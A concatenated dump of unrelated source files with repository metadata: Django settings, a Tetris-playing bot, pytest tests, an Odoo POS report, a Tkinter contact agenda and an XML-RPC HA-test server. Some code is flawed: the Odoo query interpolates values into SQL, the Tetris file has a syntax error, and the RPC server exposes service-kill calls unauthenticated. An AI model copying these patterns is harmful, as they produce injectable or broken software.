AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
edcfb344971d821721006300334822b6d4a62d2e | 22e36523e8355d5c50b28610b5c280429259087b | /omega.py | 353138bc2ba21684b67f8350d9cdd74257397bbe | [] | no_license | jumdtw/foresttetris | 5a1e9147ae28ab1ec3d9179bcb5cab41be4d488a | 32a5bafe8710277e2d6d867909e76d3a7d9bcb49 | refs/heads/master | 2023-03-01T17:52:40.500749 | 2021-02-18T13:39:53 | 2021-02-18T13:39:53 | 307,649,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,797 | py | import tetris
import copy
import random
import os
import json
'''
学習順序
1,手とる
2,盤面を毎回評価する。その際の 特徴量は各ゲーム単位ですべて保存する。
3,ゲームが終了したら(ゲームオーバーか50ライン消し終わったら)、その保存した特徴量群とスコアを紐づけて保存する
4,1000ゲーム分くらいたまったら、スコアを比較して上位100位を学習させる(もしくは特徴量数で決める)
5,やったね。
'''
class Omegamap:
# 目的座標までの軌跡
# xspinが紛らわしい
'''
aa = {
"X":1,
"Y":1,
"ANG":1,
スピンか横移動が必要な場合のmove. 直接 tetris.KEY_hogeをぶち込む
"MOVE":[],
基本これいらいないかも
"NEXT":{
"X":2,
"Y":2,
"ANG":2,
"SPIN"
"NEXT":{
}
}
}
'''
def __init__(self, x, y, ang, move):
self.map = {}
self.map['desx'] = x
self.map['desy'] = y
self.map['desang'] = ang
# 再度単純操作でゴールへと導くために、ここで軽く操作する
self.map['desmove'] = move
self.map['next'] = 0
def add_next(self, x, y, ang, move):
self.map['next'] = Omegamap(x, y, ang, move)
class Omegaplayer:
def __init__(self):
# 予測盤面生成のためにomega用のミノとfieldを生成
self.omegamino = tetris.Mino()
self.field = []
# minotypeが変わったか否かで盤面の生成を開始するので、初期値は適当に大きい値を入れる。
self.omegamino.minotype = [255]
# このリストに最適解のミノの配置を記録する。
# x, y, angの情報が入っいる
self.posminolist = [[1,1,1]]
# 計算中にスレッドに入られると困るので
self.calcflag = False
# ミノの切り替わりを検知
def cmp_map(self, cmpfield, dx, dy, angle):
if len(self.field) <= 0:
return True
self.omegamino.dmx = dx
self.omegamino.dmy = dy
self.omegamino.minoangle = angle
self.omegamino.delete(cmpfield)
for x, cf in enumerate(cmpfield):
if not cf == self.field[x]:
return True
return False
# 設置可能なミノのx, y, angをサーチ.設置可能な場所探してるだけなので配置不可な可能性はある。
def search_map(self):
poslist = []
# アングル4種類
for ang in range(4):
y = 0
while y < tetris.FIELD_HEIGHT:
for x in range(tetris.FIELD_WIDTH):
if self.omegamino.hitcheck(self.field, y, x, self.omegamino.minotype[0], ang):
if not self.omegamino.hitcheck(self.field, y+1, x, self.omegamino.minotype[0], ang):
poslist.append(Omegamap(x, y, ang, []))
y+=1
rlist = self.placement_map(poslist)
return rlist
# Trueなら上からそのまま刺せる、Falseなら横移動が必要かそもそも設置が無理
def drop_judge(self, field, minotype, minoang, mx, my):
widthlist = [
# x = 0
99,
# x = 1
99,
# x = 2
99,
# x = 3
99
]
for y in range(4):
for x in range(4):
if self.omegamino.minodate[minotype][minoang][y][x] >= 1:
# 横幅とそのピクセルの位置を把握
if widthlist[x] >= y:
widthlist[x] = y
for i,q in enumerate(widthlist):
if mx+i >= tetris.FIELD_WIDTH+1:
continue
if q>=99:
continue
bufy = my + q - 1
while bufy >=0:
if not field[bufy][mx+i] == 0:
return False
bufy-=1
return True
# spin 必要な場合はtrue, いらない場合はfalse
def xspin_judge(self, field, minotype, minoang, mx, my):
xspinX=0
xspinY=1
c=0
# xspin[minotype][minoang][mx or my][index]
xspin = [
# tspin
[
# ang = 0
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 1
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 2
[
[0,0,2,2],
[0,2,0,2]
],
# ang = 3
[
[0,0,2,2],
[0,2,0,2]
],
],
# ispin 存在しない
[],
# ospin 存在しない
[],
# Lspin
[
[
# 必要個数が3つなので同じものをかぶせて4回に統一している
[0,0,0,2],
[0,0,2,2]
],
[
[0,2,0,0],
[0,0,2,2]
],
[
[0,2,2,2],
[0,0,2,2]
],
[
[2,2,0,2],
[0,0,2,2]
],
],
# Jspin
[
[
# 必要個数が3つなので同じものをかぶせて4回に統一している
[2,2,0,2],
[0,0,2,2]
],
[
[0,0,0,2],
[0,0,2,2]
],
[
[0,2,0,0],
[0,0,2,2]
],
[
[0,2,2,2],
[0,0,2,2]
],
],
# Sspin
[
[
# 必要個数が2つなので同じものをかぶせて4回に統一している
[0,0,2,2],
[0,0,1,1]
],
[
[2,2,1,1],
[0,0,2,2]
],
[
[0,0,2,2],
[1,1,2,2]
],
[
[1,1,0,0],
[0,0,2,2]
],
],
# Zspin
[
[
# 必要個数が2つなので同じものをかぶせて4回に統一している
[2,2,0,0],
[0,0,1,1]
],
[
[1,1,2,2],
[0,0,2,2]
],
[
[2,2,0,0],
[1,1,2,2]
],
[
[0,0,1,1],
[0,0,2,2]
],
],
]
# T,I,O,L,J,S,Z
judge_count = [3,99,99,3,3,2,2]
for q in range(4):
if minotype==tetris.MINO_O or minotype==tetris.MINO_I:
continue
bufx = mx + xspin[minotype][minoang][xspinX][q]
bufy = my + xspin[minotype][minoang][xspinY][q]
if (bufx >=tetris.FIELD_WIDTH+1 or bufx <= 0) or (bufy >= tetris.FIELD_HEIGHT or bufy <= 0):
continue
if field[bufy][bufx] >= 1:
c+=1
if c >= judge_count[minotype]:
return True
return False
# search_mapして得られた設置可能x,y,angを逆算して配置可能か調べる
def placement_map(self, poslist):
rlist = []
pid = 0
# [x, y, ang]
for p in poslist:
# 上から刺せるかをまず確認する。
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"], p.map['desy']):
rlist.append(p)
continue
# 横移動させて上からさせないかを確認
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+1, p.map['desy']):
p.map["desx"] = p.map["desx"] + 1
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+2, p.map['desy']):
p.map["desx"] = p.map["desx"] + 2
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+1, p.map['desy']):
p.map["desx"] = p.map["desx"] + 3
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]+2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]+2, p.map['desy']):
p.map["desx"] = p.map["desx"] + 4
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
p.map['desmove'].append(tetris.KEY_LEFT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-1, p.map['desy']):
p.map["desx"] = p.map["desx"] - 1
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-2, p.map['desy']):
p.map["desx"] = p.map["desx"] - 2
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-1, p.map['desy']):
p.map["desx"] = p.map["desx"] - 3
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-2, p.map['desy']):
p.map["desx"] = p.map["desx"] - 4
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
else:
continue
# spin が必要ない場合で基本的には上から落とせる
# ホールの場合この判定だとバグるがそもそもホールはいい盤面とは言えないのでこれでおけ
#if not self.xspin_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"], p.map['desy']):
# rlist.append(p)
# continue
return rlist
def pos_cmp(self, mvlist, mx, my):
for p in mvlist:
if mx==p[0] and my==p[1]:
return False
return True
def debug_emap_print(self, maplist, index):
os.system('cls')
x = maplist[index].map['desx']
y = maplist[index].map['desy']
ang = maplist[index].map['desang']
buffield = copy.deepcopy(self.field)
for fy in range(4):
for fx in range(4):
if x+fx >= 0 and x+fx <= 11 and y+fy <= 20:
buffield[y+fy][x+fx] = buffield[y+fy][x+fx] or self.omegamino.minodate[self.omegamino.minotype[0]][ang][fy][fx]
for q in buffield:
for p in q:
if p==0:
print(f"{Color.WHITE}"+str(p)+' ', end='')
elif p==1:
print(f"{Color.PURPLE}"+str(p)+' ', end='')
elif p==2:
print(f"{Color.SKYBLUE}"+str(p)+' ', end='')
elif p==3:
print(f"{Color.YELLOW}"+str(p)+' ', end='')
elif p==4:
print(f"{Color.ORANGE}"+str(p)+' ', end='')
elif p==5:
print(f"{Color.BLUE}"+str(p)+' ', end='')
elif p==6:
print(f"{Color.YELLOWGREEN}"+str(p)+' ', end='')
elif p==7:
print(f"{Color.RED}"+str(p)+' ', end='')
print(f"{Color.RESET}")
def evaulate_map(self):
self.calcflag = True
maplist = self.search_map()
mr = random.randint(0,len(maplist)-1)
# コンソールにデバッグ画面の表示
self.debug_emap_print(maplist, mr)
# 新しい評価盤面を追加するため先頭を削除
self.posminolist.pop(0)
self.posminolist.append(maplist[mr])
self.calcflag = False
# 手順としては、1,ミノのangを合わせるー>2,ミノのxをそろえるー>3,ミノのyをそろえる
# tspin等は、回転するその一歩手前に目標座標を設置し、回転させる
def return_ctllist(self, curx, cury, curang):
self.calcflag = True
key = tetris.KEY_UP
# 目的座標
# 0:x, 1:y, 2:ang
fmino = self.posminolist[0]
# 回転
if curang==fmino.map['desang'] and curx==fmino.map['desx'] and cury==fmino.map['desy'] and not len(fmino.map['desmove'])==0:
print("d;alfjksd;lkfajsd")
key = fmino.map['desmove'].pop(0)
if key=tetris.KEY_LEFT:
self.posminolist[0].map['desx'] = self.posminolist[0].map['desx'] - 1
elif key ==tetris.KEY_RIGHT:
self.posminolist[0].map['desx'] = self.posminolist[0].map['desx'] + 1
elif not curang==fmino.map['desang']:
key = tetris.KEY_TURNRIGHT
elif curx < fmino.map['desx']:
print(f"RIGHT : {curx} : {fmino.map['desx']}")
key = tetris.KEY_RIGHT
elif curx > fmino.map['desx']:
print(f"LEFT : {curx} : {fmino.map['desx']}")
key = tetris.KEY_LEFT
elif not cury==fmino.map['desy']:
key = tetris.KEY_DOWN
self.calcflag = False
return key
class Color:
BLACK = '\033[30m'#(文字)黒
RED = '\033[31m'#(文字)赤
GREEN = '\033[32m'#(文字)緑
YELLOW = '\033[33m'#(文字)黄
YELLOWGREEN = '\033[38;2;171;207;0m'
BLUE = '\033[34m'#(文字)青
SKYBLUE = '\033[38;2;102;204;255m'#(文字)skyblue
MAGENTA = '\033[35m'#(文字)マゼンタ
CYAN = '\033[36m'#(文字)シアン
WHITE = '\033[37m'#(文字)白
PURPLE = '\033[38;2;255;0;255m' #(文字)紫
ORANGE = '\033[38;2;255;165;0m' #(文字)オレンジ
COLOR_DEFAULT = '\033[39m'#文字色をデフォルトに戻す
BOLD = '\033[1m'#太字
UNDERLINE = '\033[4m'#下線
INVISIBLE = '\033[08m'#不可視
REVERCE = '\033[07m'#文字色と背景色を反転
BG_BLACK = '\033[40m'#(背景)黒
BG_RED = '\033[41m'#(背景)赤
BG_GREEN = '\033[42m'#(背景)緑
BG_YELLOW = '\033[43m'#(背景)黄
BG_BLUE = '\033[44m'#(背景)青
BG_MAGENTA = '\033[45m'#(背景)マゼンタ
BG_CYAN = '\033[46m'#(背景)シアン
BG_WHITE = '\033[47m'#(背景)白
BG_DEFAULT = '\033[49m'#背景色をデフォルトに戻す
RESET = '\033[0m'#全てリセット | [
"ttnmrm1m3k5g1m3r3k@gmail.com"
] | ttnmrm1m3k5g1m3r3k@gmail.com |
9d1dac5b257b8cede94841ba46f28182fe9012f8 | 5d078b5af750e3d4fc2fc9e5b1c834b0329a34ca | /examples/miniapps/movie-lister/movies/tests.py | f6bfe81febcf3c4a2e6c02b24ab75ff0405b92f2 | [] | no_license | battyone/python-dependency-injector | 683e27be7632165764a5c957fa8dd3dbf546c77a | 53b7ad02759e9ab35a7e7c0c1fab58d523c79f3e | refs/heads/master | 2022-12-19T08:24:33.537046 | 2020-09-14T00:56:13 | 2020-09-14T00:56:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | """Tests module."""
from unittest import mock
import pytest
from .containers import ApplicationContainer
@pytest.fixture
def container():
container = ApplicationContainer()
container.config.from_dict({
'finder': {
'type': 'csv',
'csv': {
'path': '/fake-movies.csv',
'delimiter': ',',
},
'sqlite': {
'path': '/fake-movies.db',
},
},
})
return container
def test_movies_directed_by(container):
finder_mock = mock.Mock()
finder_mock.find_all.return_value = [
container.movie('The 33', 2015, 'Patricia Riggen'),
container.movie('The Jungle Book', 2016, 'Jon Favreau'),
]
with container.finder.override(finder_mock):
lister = container.lister()
movies = lister.movies_directed_by('Jon Favreau')
assert len(movies) == 1
assert movies[0].title == 'The Jungle Book'
def test_movies_released_in(container):
finder_mock = mock.Mock()
finder_mock.find_all.return_value = [
container.movie('The 33', 2015, 'Patricia Riggen'),
container.movie('The Jungle Book', 2016, 'Jon Favreau'),
]
with container.finder.override(finder_mock):
lister = container.lister()
movies = lister.movies_released_in(2015)
assert len(movies) == 1
assert movies[0].title == 'The 33'
| [
"noreply@github.com"
] | noreply@github.com |
7f0416307b8c694260d09aa9e48f3b5b5eef0c40 | 71460476c5f5ebdca719def124f1a0650861fdab | /mint_work/custom/pos_order_history_type/models/pos_sales_multi_report.py | af374a7c0fa77f540ef7d46732c590d9499bb3eb | [] | no_license | merdhah/dubai_work | fc3a70dc0b1db6df19c825a3bf1eef2a373d79c0 | e24eb12b276a4cd5b47a4bd5470d915179872a4f | refs/heads/master | 2022-01-07T11:22:07.628435 | 2018-10-17T13:37:24 | 2018-10-17T13:37:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Bista Solutions Pvt. Ltd
# Copyright (C) 2018 (http://www.bistasolutions.com)
#
##############################################################################
from odoo import models, fields, api, _
from odoo.exceptions import UserError
class PosSalesReportProductType(models.TransientModel):
_name = 'pos.sales.report.type'
company_id = fields.Many2one('res.company', default=lambda self: self.env.user.company_id.id)
type = fields.Selection([
('consu', 'Consumable'),
('service', 'Service'),
('product', 'Stockable Product')], string = 'Product Type',
default = 'consu',
help = 'A stockable product is a product for which you manage stock. The "Inventory" app has to be installed.\n'
'A consumable product, on the other hand, is a product for which stock is not managed.\n'
'A service is a non-material product you provide.\n'
'A digital content is a non-material product you sell online. The files attached to the products are the one that are sold on '
'the e-commerce such as e-books, music, pictures,... The "Digital Product" module has to be installed.')
state = fields.Selection(
[('draft', 'New'), ('cancel', 'Cancelled'), ('paid', 'Paid'), ('done', 'Posted'), ('invoiced', 'Invoiced')],
'State')
# This method is called from the wizard which will get all the pos order
# which will have the the product type which is selected in wizard.
@api.multi
def sales_order_report_type(self):
self.ensure_one()
data = {
'ids': self.id,
'model': 'pos.sales.report',
'form': self.read()[0],
}
query = """
select po.name as order,pt.name,pp.barcode, pol.qty, pol.price_unit
from pos_order_line pol
left join pos_order po ON (po.id = pol.order_id)
left join product_product pp ON (pp.id = pol.product_id)
left join product_template pt ON (pt.id = pp.product_tmpl_id)
where pt.type='%s'""" % (self.type)
if self.state :
query += """ and po.state='%s'""" % (self.state)
self.env.cr.execute(query)
result = self._cr.dictfetchall()
if result :
data.update({
'company_logo' : self.company_id.logo,
'company_name' : self.company_id.partner_id.name,
'company_street' : self.company_id.partner_id.street,
'company_street2' : self.company_id.partner_id.street2,
'company_city' : self.company_id.partner_id.city,
'company_state_id' :
self.company_id.partner_id.state_id.name,
'company_country_id' :
self.company_id.partner_id.country_id.name,
'company_zip' : self.company_id.partner_id.zip,
'company_phone' : self.company_id.partner_id.phone,
'company_mobile' : self.company_id.partner_id.mobile,
'company_fax' : self.company_id.partner_id.fax,
'company_email' : self.company_id.partner_id.email,
'company_website' : self.company_id.partner_id.website,
'product_type_name' : self.type,
'lines' : result,
})
else :
raise UserError(
_('There is no Record related to this Product Type.'))
return self.env['report'].get_action(self,
'pos_order_history_type.report_sale_orders_type', data=data)
class ReportPOSSaleOrderProductTypeMulti(models.AbstractModel):
_name = 'report.pos_order_history_type.report_sale_orders_type'
@api.multi
def render_html(self, docids, data=None):
return self.env['report'].render('pos_order_history_type.report_sale_orders_type', dict(data or {}))
| [
"asghar0517@gmail.com"
] | asghar0517@gmail.com |
a7afecd37e918863ce882a587b97678ec8755db7 | 8bb349af63c2edb9971069c9af476286499386f5 | /web/commons/util/case_insensitive_set.py | 868801da56fe3019f8357575ab27920523f7b565 | [
"MIT"
] | permissive | chicommons/maps | 061760d3a48c9350bdee9a4bee9b8e4657fce209 | 78044c30d2d88401d2f2188d96ff7e9f18a8430e | refs/heads/master | 2023-08-19T05:21:32.744965 | 2022-10-06T16:37:55 | 2022-10-06T16:37:55 | 236,360,812 | 6 | 22 | MIT | 2023-02-08T00:44:51 | 2020-01-26T19:01:24 | JavaScript | UTF-8 | Python | false | false | 637 | py | from collections import MutableSet
class CaseInsensitiveSet(MutableSet):
def __init__(self, *values):
self._values = {}
self._fold = str.casefold
for v in values:
self.add(v)
def __contains__(self, value):
return self._fold(value) in self._values
def __iter__(self):
return iter(self._values.values())
def __len__(self):
return len(self._values)
def add(self, value):
self._values[self._fold(value)] = value
def discard(self, value):
try:
del self._values[self._fold(value)]
except KeyError:
pass
| [
"laredotornado@gmail.com"
] | laredotornado@gmail.com |
739a6fa4db6e93e4f152ee82b688209c95beaf9b | fa39d5a58e0bab026d1f224eebf8e396266ad62d | /codekata/50.power of 2.py | a1970c33d65db91e6d05a4bd000412e47931ce09 | [] | no_license | renugambal/guvi | 23192431b670b2193c2430aab82ea81a543f1c13 | e4b893e941e3cd8fddcf6adbdf076b8927f68b75 | refs/heads/master | 2020-06-03T00:07:44.482826 | 2019-06-26T11:27:11 | 2019-06-26T11:27:11 | 191,355,051 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | z=int(input())
if (z & (z-1)):
print("no")
else:
print("yes")
| [
"noreply@github.com"
] | noreply@github.com |
731842503a086b941ed1861a2f341ed9a8452487 | 8533aeeaeb12248f3f4d8e7bf3ab092bee8eb881 | /build/lib/sedna/server.py | c9272ea052562ead093ccdabf02673ecb442f002 | [] | no_license | Jiakun/all_autotests | 6f5d977590b4a0cc5cef7c3df21758f4f660c987 | cde85988fa008c083afbeb980fa66960dbe3cb23 | refs/heads/master | 2021-01-18T16:47:40.916399 | 2017-04-05T04:14:26 | 2017-04-05T04:14:26 | 86,769,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,034 | py | from time import sleep
import re
from SimpleXMLRPCServer import SimpleXMLRPCServer
from sedna.common import Service
from sedna.sampler import NodeSampler
from sedna.ha.services import ServiceKiller, ServiceCommand, NodeHATest
from sedna.thread import HADaemonThread, HAScenarioThread
from sedna.ha.ha import HAResult, HAStep, HAStage
from sedna.scenario.scenario import Status
from sedna.observer import Observable, LoggerObserver, ObserverInfoType
import logging.config
LOG = logging.getLogger("")
# allow register for ha daemon thread
ha_daemon_thread = HADaemonThread()
class NodeServiceProvider(object):
"""
The class to provide services on the node server
"""
def __init__(self):
self.killer = None
self.service_commander = None
self.sampler = None
self.ha_tester = None
def sample(self, services=None, name=None, klass=None):
self.sampler = NodeSampler()
self.sampler.register_service(name=name, klass=klass)
return self.sampler.sample(services=services)
def kill(self, services):
self.killer = ServiceKiller()
return self.killer.kill_services(services)
def run_service_command(self, service, operation):
self.service_commander = ServiceCommand()
if service.methods == "systemd":
return self.service_commander.execute(
service.name, "systemctl " + operation + " ")
def run_ha_scenario(self, scenario_class=None, times=None):
self.ha_tester = NodeHATest()
return self.ha_tester.run_ha_scenario(
scenario_class=scenario_class, times=times)
class NodeServer(object):
"""
The server wrapper of node services
"""
def __init__(self, port, sampler=None, killer=None, s_commander=None,
ha_tester=None, observable=None):
"""
Server initializer.
:param port: the port the server listen to
:param sampler: the sampler instance
:param killer:
:param s_commander:
"""
self._port = int(port)
self._server = SimpleXMLRPCServer(("0.0.0.0", self._port))
self._server.register_multicall_functions()
self._server.register_instance(self)
if sampler is None:
self._sampler = NodeSampler()
else:
self._sampler = sampler
if killer is None:
self._killer = ServiceKiller()
else:
self._killer = killer
if s_commander is None:
self._service_commander = ServiceCommand()
else:
self._service_commander = s_commander
if ha_tester is None:
self._ha_tester = NodeHATest()
else:
self._ha_tester = ha_tester
if observable is not None:
self.observable = observable
else:
# Default observer
self.observable = Observable()
self.observable.register_observer(
LoggerObserver(logger=LOG, info_type=ObserverInfoType.HA))
self.ha_daemon_thread = HADaemonThread()
def start(self):
"""
Start the server.
"""
LOG.info("Listening in port %s." % self._port)
self._server.serve_forever()
def sample(self, services):
"""
The wrapper of sample method to convert service
dictionaries to service object.
:param services: the list of Service dicts
which is transformed from Service Obj to dict form .
:return: services sample result
"""
list_services = []
LOG.info("Receive raw info from Master: %s" % services)
for service in services:
list_services.append(Service(**service))
LOG.info("Receive format info from Master: %s" %
list_services)
return self._sampler.sample(list_services)
def kill(self, services):
"""
The wrapper of sample method to convert service
dictionaries to service object.
Then run to kill a service
:param services:
:return:
"""
list_services = []
LOG.info("Receive raw info from Master: %s" % services)
for service in services:
list_services.append(Service(**service))
LOG.info("Receive format info from Master: %s" %
list_services)
return self._killer.kill_services(list_services)
def run_service_command(self, service, operation):
"""
:param service:
:param operation:
:return:
"""
if service["methods"] == "systemd":
raw_result = self._service_commander.execute(
service["name"], "systemctl " + operation + " ")
result = {'status': raw_result[0],
'service': service
}
return result
def run_ha_scenario(self, scenario, times=None):
"""
:param scenario: scenario class
:param times: scenario running times
:param observer
:return:
"""
def create_ha_thread():
self.observable.notify_observer(
HAResult(name=scenario,
step="start",
stage=HAStage.EXECUTING,
status=Status.SUCCEEDED))
create_thread = None
try:
create_thread = HAScenarioThread(
ha_tester=self._ha_tester, scenario=scenario,
times=times)
create_thread.setDaemon(True)
create_thread.start()
# wait for the first scenario
while create_thread.get_executed_status() is False:
if create_thread.get_result() == -1:
self.observable.notify_observer(
HAResult(name=scenario,
step="start",
stage=HAStage.EXECUTED,
status=Status.FAILED))
return -1
elif create_thread.get_result() == 0:
break
sleep(1)
except:
self.observable.notify_observer(
HAResult(name=scenario,
step="start",
stage=HAStage.EXECUTED,
status=Status.FAILED))
return -1
self.observable.notify_observer(
HAResult(name=scenario,
step="start",
stage=HAStage.EXECUTED,
status=Status.SUCCEEDED))
self.ha_daemon_thread.register_thread(
ha_thread=create_thread, scenario=scenario)
return 0
# check whether the thread failed
if scenario == self.ha_daemon_thread.scenario:
if not self.ha_daemon_thread.ha_thread.is_alive:
return create_ha_thread()
else:
# determine whether to kill the previous daemon thread
self.observable.notify_observer(
HAResult(name=scenario,
step="stop",
stage=HAStage.EXECUTING,
status=Status.SUCCEEDED))
if self.ha_daemon_thread.ha_thread is not None:
# stop previous daemon thread
try:
self.ha_daemon_thread.ha_thread.stop()
while self.ha_daemon_thread.ha_thread.get_result() is None:
# TODO: failed scenario is acceptable?
sleep(1)
except:
self.observable.notify_observer(
HAResult(name=scenario,
step="stop",
stage=HAStage.EXECUTED,
status=Status.FAILED))
return -1
self.observable.notify_observer(
HAResult(name=scenario,
step="stop",
stage=HAStage.EXECUTED,
status=Status.SUCCEEDED))
return create_ha_thread()
def get_ha_scenario_status(self):
if self.ha_daemon_thread.ha_thread.is_alive:
self.observable.notify_observer(
HAResult(name="scenario check",
step="check",
stage="alive",
status=Status.SUCCEEDED))
return True
else:
self.observable.notify_observer(
HAResult(name="scenario check",
step="check",
stage="stopped",
status=Status.SUCCEEDED))
return False
def get_ha_daemon_thread(self):
return self.ha_daemon_thread.scenario
| [
"fjkmail@163.com"
] | fjkmail@163.com |
92f14e257307446a72feaa6fa67fe33995f82ff2 | 5b2c50a72bce5c303757e00ea16dfc000120dd7b | /Corte 3/TALLER INTERFACES GRAFICAS DE USUARIO CON TKINTER/main.py | 9bf17604086deb7be282920eadf885139d467484 | [] | no_license | LuisGomez11/Python | 8efe6ae50ef6011b65e605fcf1750442fca61971 | aa9c79cdfae80811fe6a9c3ab06574b1bcecfc86 | refs/heads/master | 2020-04-28T20:36:59.076071 | 2019-05-11T11:06:18 | 2019-05-11T11:06:18 | 175,550,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,554 | py | from tkinter import *
from tkinter import messagebox
lista = []
def guardar():
n = nombre.get()
ap = apellidoP.get()
am = apellidoM.get()
c = correo.get()
t = telefono.get()
lista.append(n+"$"+ap+"$"+am+"$"+t+"$"+c)
escribirContacto()
messagebox.showinfo("Guardado","El contacto ha sido guardado en la agenda")
nombre.set("")
apellidoP.set("")
apellidoM.set("")
correo.set("")
telefono.set("")
consultar()
def eliminar():
eliminado = conteliminar.get()
removido = False
for elemento in lista:
arreglo = elemento.split("$")
if conteliminar.get() == arreglo[3]:
lista.remove(elemento)
removido = True
escribirContacto()
consultar()
if removido:
messagebox.showinfo("Eliminar","Elemento eliminado "+eliminado)
def consultar():
r = Text(ventana, width=80, height=15)
lista.sort()
valores = []
r.insert(INSERT, "Nombre\tApellido Pa\t\tApellido Ma\t\tTeléfono\t\tCorreo\n")
for elemento in lista:
arreglo = elemento.split("$")
valores.append(arreglo[3])
r.insert(INSERT, arreglo[0]+"\t"+arreglo[1]+"\t\t"+arreglo[2]+"\t\t"+arreglo[3]+"\t\t"+arreglo[4]+"\t\n")
r.place(x=20,y=350)
spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
if lista == []:
spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
r.config(state=DISABLED)
def iniciarArchivo():
archivo = open("ag.txt","a")
archivo.close()
def cargar():
archivo = open("ag.txt","r")
linea = archivo.readline()
if linea:
while linea:
if linea[-1]=='\n':
linea = linea[:-1]
lista.append(linea)
linea = archivo.readline()
archivo.close()
def escribirContacto():
archivo = open("ag.txt","w")
lista.sort()
for elemento in lista:
archivo.write(elemento+"\n")
archivo.close()
ventana = Tk()
# Variables
nombre = StringVar()
apellidoP = StringVar()
apellidoM = StringVar()
correo = StringVar()
telefono = StringVar()
conteliminar = StringVar()
# Colores
colorFondo = "#066"
colorLetra = "#FFF"
iniciarArchivo()
cargar()
consultar()
# Opciones de la ventana
ventana.title("Agenda de archivos")
ventana.geometry("700x500")
ventana.configure(background = colorFondo)
# Etiquetas, cajas de texto y botones
titulo = Label(ventana, text="Agenda de archivos", fg=colorLetra, bg=colorFondo).place(x=280,y=10)
labelNombre = Label(ventana, text="Nombre", bg=colorFondo, fg=colorLetra).place(x=50, y=60)
